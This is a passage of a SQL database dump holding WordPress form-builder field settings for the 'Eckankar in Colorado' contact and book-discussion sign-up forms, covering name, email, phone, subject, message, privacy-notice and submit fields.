left'),(9881,305,'show_desc','0','show_desc','0'),(9882,305,'desc_pos','none','desc_pos','none'),(9883,305,'desc_text','','desc_text',''),(9884,305,'element_class','','element_class',''),(9885,305,'key','hr_273','key','hr_273'),(9886,305,'parent_id','13','parent_id','13'),(9887,305,'editActive','','editActive',''),(9888,305,'field_label','hr','field_label','hr'),(9889,305,'field_key','hr_273','field_key','hr_273'),(9890,305,'container_class','','container_class',''),(9891,306,'type','textbox','type','textbox'),(9892,306,'order','6','order','6'),(9893,306,'fav_id','','fav_id',''),(9894,306,'def_id','','def_id',''),(9895,306,'label','Message Subject','label','Message Subject'),(9896,306,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9897,306,'label_pos','above','label_pos','above'),(9898,306,'placeholder','','placeholder',''),(9899,306,'first_name','','first_name',''),(9900,306,'last_name','','last_name',''),(9901,306,'user_address_1','','user_address_1',''),(9902,306,'user_address_2','','user_address_2',''),(9903,306,'user_city','','user_city',''),(9904,306,'user_zip','','user_zip',''),(9905,306,'user_phone','','user_phone',''),(9906,306,'user_email','','user_email',''),(9907,306,'user_info_field_group','1','user_info_field_group','1'),(9908,306,'disable_input','0','disable_input','0'),(9909,306,'mask','','mask',''),(9910,306,'input_limit','','input_limit',''),(9911,306,'input_limit_type','char','input_limit_type','char'),(9912,306,'calc_auto_include','0','calc_auto_include','0'),(9913,306,'datepicker','0','datepicker','0'),(9914,306,'user_state','0','user_state','0'),(9915,306,'autocomplete_off','0','autocomplete_off','0'),(9916,306,'num_sort','0','num_sort','0'),(9917,306,'admin_label','','admin_label',''),(9918,306,'user_info_field_group_name','','user_info_field_group_name',''),(9919,306,'user_info_field_group_custom','','user_info_field_group_custom',''),(9920,306,'show_help','0','show_help','0'),(9921,306,'help_text','','help_text',''),(9922,306,'show_desc','0','show_desc','0'),(9923,306,'desc_pos','none','desc_pos','none'),(9924,306,'desc_text','','desc_text',''),(9925,306,'element_class','','element_class',''),(9926,306,'required','1','required','1'),(9927,306,'key','textbox_303','key','textbox_303'),(9928,306,'parent_id','13','parent_id','13'),(9929,306,'editActive','','editActive',''),(9930,306,'field_label','Message Subject','field_label','Message Subject'),(9931,306,'field_key','textbox_303','field_key','textbox_303'),(9932,306,'default','','default',''),(9933,306,'container_class','','container_class',''),(9934,306,'manual_key','','manual_key',''),(9935,306,'custom_mask','','custom_mask',''),(9936,306,'custom_name_attribute','','custom_name_attribute',''),(9937,306,'personally_identifiable','','personally_identifiable',''),(9938,306,'value','','value',''),(9939,307,'type','textarea','type','textarea'),(9940,307,'order','7','order','7'),(9941,307,'fav_id','','fav_id',''),(9942,307,'def_id','','def_id',''),(9943,307,'label','Enter Your Message Here','label','Enter Your Message Here'),(9944,307,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9945,307,'label_pos','above','label_pos','above'),(9946,307,'default_value','','default_value',''),(9947,307,'textarea_rte','0','textarea_rte','0'),(9948,307,'textarea_media','0','textarea_media','0'),(9949,307,'disable_rte_mobile','0','disable_rte_mobile','0'),(9950,307,'input_limit','','input_limit',''),(9951,307,'input_limit_type','char','input_limit_type','char'),(9952,307,'calc_auto_include','0','calc_auto_include','0'),(9953,307,'num_sort','0','num_sort','0'),(9954,307,'admin_label','','admin_label',''),(9955,307,'show_help','0','show_help','0'),(9956,307,'help_text','','help_text',''),(9957,307,'show_desc','0','show_desc','0'),(9958,307,'desc_pos','none','desc_pos','none'),(9959,307,'desc_text','','desc_text',''),(9960,307,'element_class','','element_class',''),(9961,307,'required','1','required','1'),(9962,307,'default','','default',''),(9963,307,'key','textarea_276','key','textarea_276'),(9964,307,'parent_id','13','parent_id','13'),(9965,307,'editActive','','editActive',''),(9966,307,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(9967,307,'field_key','textarea_276','field_key','textarea_276'),(9968,307,'placeholder','','placeholder',''),(9969,307,'container_class','','container_class',''),(9970,307,'manual_key','','manual_key',''),(9971,307,'value','','value',''),(9972,308,'type','html','type','html'),(9973,308,'order','8','order','8'),(9974,308,'fav_id','','fav_id',''),(9975,308,'def_id','','def_id',''),(9976,308,'label','Text','label','Text'),(9977,308,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9978,308,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(9979,308,'desc_el','div','desc_el','div'),(9980,308,'show_desc','0','show_desc','0'),(9981,308,'desc_pos','none','desc_pos','none'),(9982,308,'desc_text','','desc_text',''),(9983,308,'element_class','','element_class',''),(9984,308,'default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(9985,308,'key','html_305','key','html_305'),(9986,308,'parent_id','13','parent_id','13'),(9987,308,'editActive','','editActive',''),(9988,308,'field_label','Text','field_label','Text'),(9989,308,'field_key','html_305','field_key','html_305'),(9990,308,'container_class','','container_class',''),(17062,600,'label_pos','above','label_pos','above'),(17061,600,'label','First Name','label','First Name'),(17060,600,'def_id','6','def_id','6'),(17059,600,'fav_id','','fav_id',''),(17551,629,'container_class','','container_class',''),(17549,629,'type','html','type','html'),(17550,629,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17548,629,'label','HTML','label','HTML'),(17547,629,'idAttribute','id','idAttribute','id'),(10010,310,'type','submit','type','submit'),(10011,310,'order','10','order','10'),(10012,310,'fav_id','','fav_id',''),(10013,310,'def_id','','def_id',''),(10014,310,'label','Submit','label','Submit'),(10015,310,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(10016,310,'show_help','0','show_help','0'),(10017,310,'help_text','','help_text',''),(10018,310,'show_desc','0','show_desc','0'),(10019,310,'desc_pos','none','desc_pos','none'),(10020,310,'desc_text','','desc_text',''),(10021,310,'processing_label','Processing','processing_label','Processing'),(10022,310,'element_class','','element_class',''),(10023,310,'key','submit_278','key','submit_278'),(10024,310,'parent_id','13','parent_id','13'),(10025,310,'editActive','','editActive',''),(10026,310,'field_label','Submit','field_label','Submit'),(10027,310,'field_key','submit_278','field_key','submit_278'),(10028,310,'container_class','','container_class',''),(10029,303,'drawerDisabled','','drawerDisabled',''),(10030,104,'drawerDisabled','','drawerDisabled',''),(10054,312,'objectType','Field','objectType','Field'),(10055,312,'objectDomain','fields','objectDomain','fields'),(10056,312,'editActive','','editActive',''),(10057,312,'order','1','order','1'),(10058,312,'type','textbox','type','textbox'),(10059,312,'fav_id','','fav_id',''),(10060,312,'def_id','6','def_id','6'),(10061,312,'label','First Name','label','First Name'),(10062,312,'label_pos','above','label_pos','above'),(10063,312,'mask','','mask',''),(10064,312,'datepicker','0','datepicker','0'),(10065,312,'first_name','1','first_name','1'),(10066,312,'last_name','0','last_name','0'),(10067,312,'from_name','0','from_name','0'),(10068,312,'user_info_field_group','1','user_info_field_group','1'),(10069,312,'show_help','0','show_help','0'),(10070,312,'help_text','','help_text',''),(10071,312,'calc_auto_include','0','calc_auto_include','0'),(10072,312,'calc_option','0','calc_option','0'),(10073,312,'placeholder','','placeholder',''),(10074,312,'user_address_1','','user_address_1',''),(10075,312,'user_address_2','','user_address_2',''),(10076,312,'user_city','','user_city',''),(10077,312,'user_zip','','user_zip',''),(10078,312,'user_phone','','user_phone',''),(10079,312,'user_email','','user_email',''),(10080,312,'disable_input','0','disable_input','0'),(10081,312,'input_limit','','input_limit',''),(10082,312,'input_limit_type','char','input_limit_type','char'),(10083,312,'input_limit_msg','','input_limit_msg',''),(10084,312,'user_state','0','user_state','0'),(10085,312,'autocomplete_off','0','autocomplete_off','0'),(10086,312,'num_sort','0','num_sort','0'),(10087,312,'admin_label','','admin_label',''),(10088,312,'user_info_field_group_name','','user_info_field_group_name',''),(10089,312,'user_info_field_group_custom','','user_info_field_group_custom',''),(10090,312,'show_desc','0','show_desc','0'),(10091,312,'desc_pos','none','desc_pos','none'),(10092,312,'desc_text','','desc_text',''),(10093,312,'element_class','','element_class',''),(10094,312,'required','1','required','1'),(10095,312,'key','textbox_268','key','textbox_268'),(10096,312,'field_label','First Name','field_label','First Name'),(10097,312,'field_key','textbox_268','field_key','textbox_268'),(10098,312,'default','','default',''),(10099,312,'container_class','one-half first','container_class','one-half first'),(10100,312,'manual_key','','manual_key',''),(10101,312,'custom_mask','','custom_mask',''),(10102,312,'custom_name_attribute','','custom_name_attribute',''),(10103,312,'personally_identifiable','','personally_identifiable',''),(10104,312,'value','','value',''),(10105,312,'parent_id','35','parent_id','35'),(10106,313,'objectType','Field','objectType','Field'),(10107,313,'objectDomain','fields','objectDomain','fields'),(10108,313,'editActive','','editActive',''),(10109,313,'order','2','order','2'),(10110,313,'type','lastname','type','lastname'),(10111,313,'fav_id','','fav_id',''),(10112,313,'def_id','7','def_id','7'),(10113,313,'label','Last Name','label','Last Name'),(10114,313,'label_pos','above','label_pos','above'),(10115,313,'mask','','mask',''),(10116,313,'datepicker','0','datepicker','0'),(10117,313,'first_name','0','first_name','0'),(10118,313,'from_name','0','from_name','0'),(10119,313,'user_info_field_group','1','user_info_field_group','1'),(10120,313,'show_help','0','show_help','0'),(10121,313,'help_text','','help_text',''),(10122,313,'calc_auto_include','0','calc_auto_include','0'),(10123,313,'calc_option','0','calc_option','0'),(10124,313,'placeholder','','placeholder',''),(10125,313,'user_address_1','','user_address_1',''),(10126,313,'user_address_2','','user_address_2',''),(10127,313,'user_city','','user_city',''),(10128,313,'user_zip','','user_zip',''),(10129,313,'user_phone','','user_phone',''),(10130,313,'user_email','','user_email',''),(10131,313,'disable_input','0','disable_input','0'),(10132,313,'input_limit','','input_limit',''),(10133,313,'input_limit_type','char','input_limit_type','char'),(10134,313,'input_limit_msg','','input_limit_msg',''),(10135,313,'user_state','0','user_state','0'),(10136,313,'autocomplete_off','0','autocomplete_off','0'),(10137,313,'num_sort','0','num_sort','0'),(10138,313,'admin_label','','admin_label',''),(10139,313,'user_info_field_group_name','','user_info_field_group_name',''),(10140,313,'user_info_field_group_custom','','user_info_field_group_custom',''),(10141,313,'show_desc','0','show_desc','0'),(10142,313,'desc_pos','none','desc_pos','none'),(10143,313,'desc_text','','desc_text',''),(10144,313,'element_class','','element_class',''),(10145,313,'required','1','required','1'),(10146,313,'key','lastname_269','key','lastname_269'),(10147,313,'field_label','Last Name','field_label','Last Name'),(10148,313,'field_key','lastname_269','field_key','lastname_269'),(10149,313,'default','','default',''),(10150,313,'container_class','one-half','container_class','one-half'),(10151,313,'custom_name_attribute','lname','custom_name_attribute','lname'),(10152,313,'personally_identifiable','1','personally_identifiable','1'),(10153,313,'value','','value',''),(10154,313,'parent_id','35','parent_id','35'),(10155,314,'objectType','Field','objectType','Field'),(10156,314,'objectDomain','fields','objectDomain','fields'),(10157,314,'editActive','','editActive',''),(10158,314,'order','4','order','4'),(10159,314,'type','email','type','email'),(10160,314,'fav_id','','fav_id',''),(10161,314,'def_id','14','def_id','14'),(10162,314,'label','Email','label','Email'),(10163,314,'label_pos','above','label_pos','above'),(10164,314,'mask','','mask',''),(10165,314,'datepicker','0','datepicker','0'),(10166,314,'first_name','0','first_name','0'),(10167,314,'last_name','0','last_name','0'),(10168,314,'from_name','0','from_name','0'),(10169,314,'user_address_1','0','user_address_1','0'),(10170,314,'user_address_2','0','user_address_2','0'),(10171,314,'user_city','0','user_city','0'),(10172,314,'user_zip','0','user_zip','0'),(10173,314,'user_phone','0','user_phone','0'),(10174,314,'user_info_field_group','1','user_info_field_group','1'),(10175,314,'show_help','0','show_help','0'),(10176,314,'help_text','','help_text',''),(10177,314,'calc_auto_include','0','calc_auto_include','0'),(10178,314,'calc_option','0','calc_option','0'),(10179,314,'placeholder','','placeholder',''),(10180,314,'disable_input','0','disable_input','0'),(10181,314,'input_limit','','input_limit',''),(10182,314,'input_limit_type','char','input_limit_type','char'),(10183,314,'input_limit_msg','','input_limit_msg',''),(10184,314,'user_state','0','user_state','0'),(10185,314,'autocomplete_off','0','autocomplete_off','0'),(10186,314,'num_sort','0','num_sort','0'),(10187,314,'admin_label','','admin_label',''),(10188,314,'user_info_field_group_name','','user_info_field_group_name',''),(10189,314,'user_info_field_group_custom','','user_info_field_group_custom',''),(10190,314,'show_desc','0','show_desc','0'),(10191,314,'desc_pos','none','desc_pos','none'),(10192,314,'desc_text','','desc_text',''),(10193,314,'element_class','','element_class',''),(10194,314,'required','1','required','1'),(10195,314,'key','email_270','key','email_270'),(10196,314,'field_label','Email','field_label','Email'),(10197,314,'field_key','email_270','field_key','email_270'),(10198,314,'default','','default',''),(10199,314,'container_class','one-half','container_class','one-half'),(10200,314,'custom_name_attribute','email','custom_name_attribute','email'),(10201,314,'personally_identifiable','1','personally_identifiable','1'),(10202,314,'value','','value',''),(10203,314,'parent_id','35','parent_id','35'),(10204,315,'objectType','Field','objectType','Field'),(10205,315,'objectDomain','fields','objectDomain','fields'),(10206,315,'editActive','','editActive',''),(10207,315,'order','5','order','5'),(10208,315,'type','textbox','type','textbox'),(10209,315,'fav_id','','fav_id',''),(10210,315,'def_id','','def_id',''),(10211,315,'label','Message Subject','label','Message Subject'),(10212,315,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(10213,315,'label_pos','above','label_pos','above'),(10214,315,'placeholder','','placeholder',''),(10215,315,'first_name','','first_name',''),(10216,315,'last_name','','last_name',''),(10217,315,'user_address_1','','user_address_1',''),(10218,315,'user_address_2','','user_address_2',''),(10219,315,'user_city','','user_city',''),(10220,315,'user_zip','','user_zip',''),(10221,315,'user_phone','','user_phone',''),(10222,315,'user_email','','user_email',''),(10223,315,'user_info_field_group','1','user_info_field_group','1'),(10224,315,'disable_input','0','disable_input','0'),(10225,315,'mask','','mask',''),(10226,315,'input_limit','','input_limit',''),(10227,315,'input_limit_type','char','input_limit_type','char'),(10228,315,'calc_auto_include','0','calc_auto_include','0'),(10229,315,'datepicker','0','datepicker','0'),(10230,315,'user_state','0','user_state','0'),(10231,315,'autocomplete_off','0','autocomplete_off','0'),(10232,315,'num_sort','0','num_sort','0'),(10233,315,'admin_label','','admin_label',''),(10234,315,'user_info_field_group_name','','user_info_field_group_name',''),(10235,315,'user_info_field_group_custom','','user_info_field_group_custom',''),(10236,315,'show_help','0','show_help','0'),(10237,315,'help_text','','help_text',''),(10238,315,'show_desc','0','show_desc','0'),(10239,315,'desc_pos','none','desc_pos','none'),(10240,315,'desc_text','','desc_text',''),(10241,315,'element_class','','element_class',''),(10242,315,'required','1','required','1'),(10243,315,'key','textbox_303','key','textbox_303'),(10244,315,'field_label','Message Subject','field_label','Message Subject'),(10245,315,'field_key','textbox_303','field_key','textbox_303'),(10246,315,'default','','default',''),(10247,315,'container_class','','container_class',''),(10248,315,'manual_key','','manual_key',''),(10249,315,'custom_mask','','custom_mask',''),(10250,315,'custom_name_attribute','','custom_name_attribute',''),(10251,315,'personally_identifiable','','personally_identifiable',''),(10252,315,'value','','value',''),(10253,315,'parent_id','35','parent_id','35'),(10254,316,'objectType','Field','objectType','Field'),(10255,316,'objectDomain','fields','objectDomain','fields'),(10256,316,'editActive','','editActive',''),(10257,316,'order','6','order','6'),(10258,316,'type','textarea','type','textarea'),(10259,316,'fav_id','','fav_id',''),(10260,316,'def_id','','def_id',''),(10261,316,'label','Please Enter Your Message Here','label','Please Enter Your Message Here'),(10262,316,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(10263,316,'label_pos','above','label_pos','above'),(10264,316,'default_value','','default_value',''),(10265,316,'textarea_rte','0','textarea_rte','0'),(10266,316,'textarea_media','0','textarea_media','0'),(10267,316,'disable_rte_mobile','0','disable_rte_mobile','0'),(10268,316,'input_limit','','input_limit',''),(10269,316,'input_limit_type','char','input_limit_type','char'),(10270,316,'calc_auto_include','0','calc_auto_include','0'),(10271,316,'num_sort','0','num_sort','0'),(10272,316,'admin_label','','admin_label',''),(10273,316,'show_help','0','show_help','0'),(10274,316,'help_text','','help_text',''),(10275,316,'show_desc','0','show_desc','0'),(10276,316,'desc_pos','none','desc_pos','none'),(10277,316,'desc_text','','desc_text',''),(10278,316,'element_class','','element_class',''),(10279,316,'required','1','required','1'),(10280,316,'default','','default',''),(10281,316,'key','please_enter_your_message_here_1599585729237','key','please_enter_your_message_here_1599585729237'),(10282,316,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(10283,316,'field_key','textarea_276','field_key','textarea_276'),(10284,316,'placeholder','','placeholder',''),(10285,316,'container_class','','container_class',''),(10286,316,'manual_key','','manual_key',''),(10287,316,'value','','value',''),(10288,316,'parent_id','35','parent_id','35'),(10289,317,'objectType','Field','objectType','Field'),(10290,317,'objectDomain','fields','objectDomain','fields'),(10291,317,'editActive','','editActive',''),(10292,317,'order','7','order','7'),(10293,317,'type','html','type','html'),(10294,317,'fav_id','','fav_id',''),(10295,317,'def_id','','def_id',''),(10296,317,'label','Text','label','Text'),(10297,317,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(10298,317,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(10299,317,'desc_el','div','desc_el','div'),(10300,317,'show_desc','0','show_desc','0'),(10301,317,'desc_pos','none','desc_pos','none'),(10302,317,'desc_text','','desc_text',''),(10303,317,'element_class','','element_class',''),(10304,317,'default','<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>','default','<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>'),(10305,317,'key','html_305','key','html_305'),(10306,317,'field_label','Text','field_label','Text'),(10307,317,'field_key','html_305','field_key','html_305'),(10308,317,'container_class','','container_class',''),(10309,317,'parent_id','35','parent_id','35'),(17058,600,'order','2','order','2'),(17057,600,'type','textbox','type','textbox'),(17056,600,'editActive','','editActive',''),(17055,600,'custom_name_attribute','','custom_name_attribute',''),(17054,600,'custom_mask','','custom_mask',''),(17053,600,'manual_key','','manual_key',''),(17500,624,'type','html','type','html'),(17498,624,'idAttribute','id','idAttribute','id'),(17499,624,'label','HTML','label','HTML'),(17496,624,'editActive','','editActive',''),(17497,624,'order','9','order','9'),(17495,139,'drawerDisabled','','drawerDisabled',''),(10332,319,'objectType','Field','objectType','Field'),(10333,319,'objectDomain','fields','objectDomain','fields'),(10334,319,'editActive','','editActive',''),(10335,319,'order','9','order','9'),(10336,319,'type','submit','type','submit'),(10337,319,'fav_id','','fav_id',''),(10338,319,'def_id','','def_id',''),(10339,319,'label','Submit','label','Submit'),(10340,319,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(10341,319,'show_help','0','show_help','0'),(10342,319,'help_text','','help_text',''),(10343,319,'show_desc','0','show_desc','0'),(10344,319,'desc_pos','none','desc_pos','none'),(10345,319,'desc_text','','desc_text',''),(10346,319,'processing_label','Processing','processing_label','Processing'),(10347,319,'element_class','','element_class',''),(10348,319,'key','submit_278','key','submit_278'),(10349,319,'field_label','Submit','field_label','Submit'),(10350,319,'field_key','submit_278','field_key','submit_278'),(10351,319,'container_class','','container_class',''),(10352,319,'parent_id','35','parent_id','35'),(11205,355,'user_info_field_group_custom','','user_info_field_group_custom',''),(11204,355,'user_info_field_group_name','','user_info_field_group_name',''),(11203,355,'admin_label','','admin_label',''),(11186,355,'user_address_2','0','user_address_2','0'),(11187,355,'user_city','0','user_city','0'),(11188,355,'user_zip','0','user_zip','0'),(11189,355,'user_phone','0','user_phone','0'),(11190,355,'user_info_field_group','1','user_info_field_group','1'),(11191,355,'show_help','0','show_help','0'),(11192,355,'help_text','','help_text',''),(11193,355,'calc_auto_include','0','calc_auto_include','0'),(11194,355,'calc_option','0','calc_option','0'),(11179,355,'label_pos','above','label_pos','above'),(11180,355,'mask','','mask',''),(11181,355,'datepicker','0','datepicker','0'),(11182,355,'first_name','0','first_name','0'),(11183,355,'last_name','0','last_name','0'),(11184,355,'from_name','0','from_name','0'),(11185,355,'user_address_1','0','user_address_1','0'),(11080,353,'manual_key','','manual_key',''),(11081,353,'custom_mask','','custom_mask',''),(11082,353,'custom_name_attribute','','custom_name_attribute',''),(11083,353,'editActive','','editActive',''),(11084,353,'type','textbox','type','textbox'),(11085,353,'order','1','order','1'),(11086,353,'fav_id','','fav_id',''),(11087,353,'def_id','6','def_id','6'),(11088,353,'label','First Name','label','First Name'),(11089,353,'label_pos','above','label_pos','above'),(11090,353,'mask','','mask',''),(11091,353,'datepicker','0','datepicker','0'),(11092,353,'first_name','1','first_name','1'),(11093,353,'last_name','0','last_name','0'),(11094,353,'from_name','0','from_name','0'),(11095,353,'user_info_field_group','1','user_info_field_group','1'),(11096,353,'show_help','0','show_help','0'),(11097,353,'help_text','','help_text',''),(11098,353,'calc_auto_include','0','calc_auto_include','0'),(11099,353,'calc_option','0','calc_option','0'),(11100,353,'placeholder','','placeholder',''),(11101,353,'user_address_1','','user_address_1',''),(11102,353,'user_address_2','','user_address_2',''),(11103,353,'user_city','','user_city',''),(11104,353,'user_zip','','user_zip',''),(11105,353,'user_phone','','user_phone',''),(11106,353,'user_email','','user_email',''),(11107,353,'disable_input','0','disable_input','0'),(11108,353,'input_limit','','input_limit',''),(11109,353,'input_limit_type','char','input_limit_type','char'),(11110,353,'input_limit_msg','','input_limit_msg',''),(11111,353,'user_state','0','user_state','0'),(11112,353,'autocomplete_off','0','autocomplete_off','0'),(11113,353,'num_sort','0','num_sort','0'),(11114,353,'admin_label','','admin_label',''),(11115,353,'user_info_field_group_name','','user_info_field_group_name',''),(11116,353,'user_info_field_group_custom','','user_info_field_group_custom',''),(11117,353,'show_desc','0','show_desc','0'),(11118,353,'desc_pos','none','desc_pos','none'),(11119,353,'desc_text','','desc_text',''),(11120,353,'element_class','','element_class',''),(11121,353,'required','1','required','1'),(11122,353,'key','textbox_268','key','textbox_268'),(11195,355,'placeholder','','placeholder',''),(11196,355,'disable_input','0','disable_input','0'),(11197,355,'input_limit','','input_limit',''),(11198,355,'input_limit_type','char','input_limit_type','char'),(11199,355,'input_limit_msg','','input_limit_msg',''),(11200,355,'user_state','0','user_state','0'),(11201,355,'autocomplete_off','0','autocomplete_off','0'),(11202,355,'num_sort','0','num_sort','0'),(11054,134,'drawerDisabled','','drawerDisabled',''),(11055,135,'drawerDisabled','','drawerDisabled',''),(11056,352,'editActive','','editActive',''),(11057,352,'field_label','Text','field_label','Text'),(11058,352,'field_key','html_267','field_key','html_267'),(11059,352,'container_class','','container_class',''),(11060,352,'drawerDisabled','','drawerDisabled',''),(11061,352,'type','html','type','html'),(11062,352,'order','0','order','0'),(11063,352,'fav_id','','fav_id',''),(11064,352,'def_id','','def_id',''),(11065,352,'label','Text','label','Text'),(11066,352,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11067,352,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below'),(11068,352,'desc_el','div','desc_el','div'),(11069,352,'show_desc','0','show_desc','0'),(11070,352,'desc_pos','none','desc_pos','none'),(11071,352,'desc_text','','desc_text',''),(11072,352,'element_class','','element_class',''),(11073,352,'default','<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Book Discussion Sign-up<br></strong></span></h3>  <p>Please Enter Your Information Below</p>','default','<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Book Discussion Sign-up<br></strong></span></h3>  <p>Please Enter Your Information Below</p>'),(11074,352,'key','html_267','key','html_267'),(11075,352,'parent_id','13','parent_id','13'),(11076,353,'field_label','First Name','field_label','First Name'),(11077,353,'field_key','textbox_268','field_key','textbox_268'),(11078,353,'default','','default',''),(11079,353,'container_class','','container_class',''),(11123,353,'parent_id','13','parent_id','13'),(11124,353,'personally_identifiable','','personally_identifiable',''),(11125,353,'value','','value',''),(11126,354,'type','lastname','type','lastname'),(11127,354,'order','2','order','2'),(11128,354,'fav_id','','fav_id',''),(11129,354,'def_id','7','def_id','7'),(11130,354,'label','Last Name','label','Last Name'),(11131,354,'label_pos','above','label_pos','above'),(11132,354,'mask','','mask',''),(11133,354,'datepicker','0','datepicker','0'),(11134,354,'first_name','0','first_name','0'),(11135,354,'from_name','0','from_name','0'),(11136,354,'user_info_field_group','1','user_info_field_group','1'),(11137,354,'show_help','0','show_help','0'),(11138,354,'help_text','','help_text',''),(11139,354,'calc_auto_include','0','calc_auto_include','0'),(11140,354,'calc_option','0','calc_option','0'),(11141,354,'placeholder','','placeholder',''),(11142,354,'user_address_1','','user_address_1',''),(11143,354,'user_address_2','','user_address_2',''),(11144,354,'user_city','','user_city',''),(11145,354,'user_zip','','user_zip',''),(11146,354,'user_phone','','user_phone',''),(11147,354,'user_email','','user_email',''),(11148,354,'disable_input','0','disable_input','0'),(11149,354,'input_limit','','input_limit',''),(11150,354,'input_limit_type','char','input_limit_type','char'),(11151,354,'input_limit_msg','','input_limit_msg',''),(11152,354,'user_state','0','user_state','0'),(11153,354,'autocomplete_off','0','autocomplete_off','0'),(11154,354,'num_sort','0','num_sort','0'),(11155,354,'admin_label','','admin_label',''),(11156,354,'user_info_field_group_name','','user_info_field_group_name',''),(11157,354,'user_info_field_group_custom','','user_info_field_group_custom',''),(11158,354,'show_desc','0','show_desc','0'),(11159,354,'desc_pos','none','desc_pos','none'),(11160,354,'desc_text','','desc_text',''),(11161,354,'element_class','','element_class',''),(11162,354,'required','1','required','1'),(11163,354,'key','lastname_269','key','lastname_269'),(11164,354,'parent_id','13','parent_id','13'),(11165,354,'editActive','','editActive',''),(11166,354,'field_label','Last Name','field_label','Last Name'),(11167,354,'field_key','lastname_269','field_key','lastname_269'),(11168,354,'default','','default',''),(11169,354,'container_class','','container_class',''),(11170,354,'custom_name_attribute','lname','custom_name_attribute','lname'),(11171,354,'personally_identifiable','1','personally_identifiable','1'),(11172,354,'value','','value',''),(11173,354,'drawerDisabled','','drawerDisabled',''),(11174,355,'type','email','type','email'),(11175,355,'order','3','order','3'),(11176,355,'fav_id','','fav_id',''),(11177,355,'def_id','14','def_id','14'),(11178,355,'label','Email','label','Email'),(11215,355,'field_key','email_270','field_key','email_270'),(11214,355,'field_label','Email','field_label','Email'),(11213,355,'editActive','','editActive',''),(11211,355,'key','email_270','key','email_270'),(11212,355,'parent_id','13','parent_id','13'),(11210,355,'required','1','required','1'),(11209,355,'element_class','','element_class',''),(11207,355,'desc_pos','none','desc_pos','none'),(11208,355,'desc_text','','desc_text',''),(11206,355,'show_desc','0','show_desc','0'),(11050,313,'drawerDisabled','','drawerDisabled',''),(11051,333,'drawerDisabled','','drawerDisabled',''),(11052,314,'drawerDisabled','','drawerDisabled',''),(10735,333,'mask','','mask',''),(10736,333,'custom_mask','','custom_mask',''),(10737,333,'custom_name_attribute','phone','custom_name_attribute','phone'),(10738,333,'personally_identifiable','1','personally_identifiable','1'),(10739,333,'value','','value',''),(10740,316,'drawerDisabled','','drawerDisabled',''),(10741,317,'drawerDisabled','','drawerDisabled',''),(10734,333,'help_text','','help_text',''),(10733,333,'admin_label','','admin_label',''),(10732,333,'manual_key','','manual_key',''),(10721,333,'type','phone','type','phone'),(10722,333,'key','phone_1599585699152','key','phone_1599585699152'),(10723,333,'label_pos','default','label_pos','default'),(10724,333,'required','1','required','1'),(10725,333,'default','','default',''),(10726,333,'placeholder','','placeholder',''),(10727,333,'container_class','one-half first','container_class','one-half first'),(10728,333,'element_class','','element_class',''),(10729,333,'input_limit','','input_limit',''),(10730,333,'input_limit_type','characters','input_limit_type','characters'),(10731,333,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(10720,333,'label','Phone','label','Phone'),(10718,333,'editActive','','editActive',''),(10719,333,'order','3','order','3'),(11216,355,'default','','default',''),(11217,355,'container_class','','container_class',''),(11218,355,'custom_name_attribute','email','custom_name_attribute','email'),(11219,355,'personally_identifiable','1','personally_identifiable','1'),(11220,355,'value','','value',''),(11221,356,'type','hr','type','hr'),(11222,356,'order','4','order','4'),(11223,356,'fav_id','','fav_id',''),(11224,356,'def_id','','def_id',''),(11225,356,'label','hr','label','hr'),(11226,356,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(11227,356,'show_desc','0','show_desc','0'),(11228,356,'desc_pos','none','desc_pos','none'),(11229,356,'desc_text','','desc_text',''),(11230,356,'element_class','','element_class',''),(11231,356,'key','hr_273','key','hr_273'),(11232,356,'parent_id','13','parent_id','13'),(11233,356,'editActive','','editActive',''),(11234,356,'field_label','hr','field_label','hr'),(11235,356,'field_key','hr_273','field_key','hr_273'),(11236,356,'container_class','','container_class',''),(11237,357,'type','textbox','type','textbox'),(11238,357,'order','5','order','5'),(11239,357,'fav_id','','fav_id',''),(11240,357,'def_id','','def_id',''),(11241,357,'label','Message Subject','label','Message Subject'),(11242,357,'input_limit_msg','character(s) left','input_limit_msg','character(s) 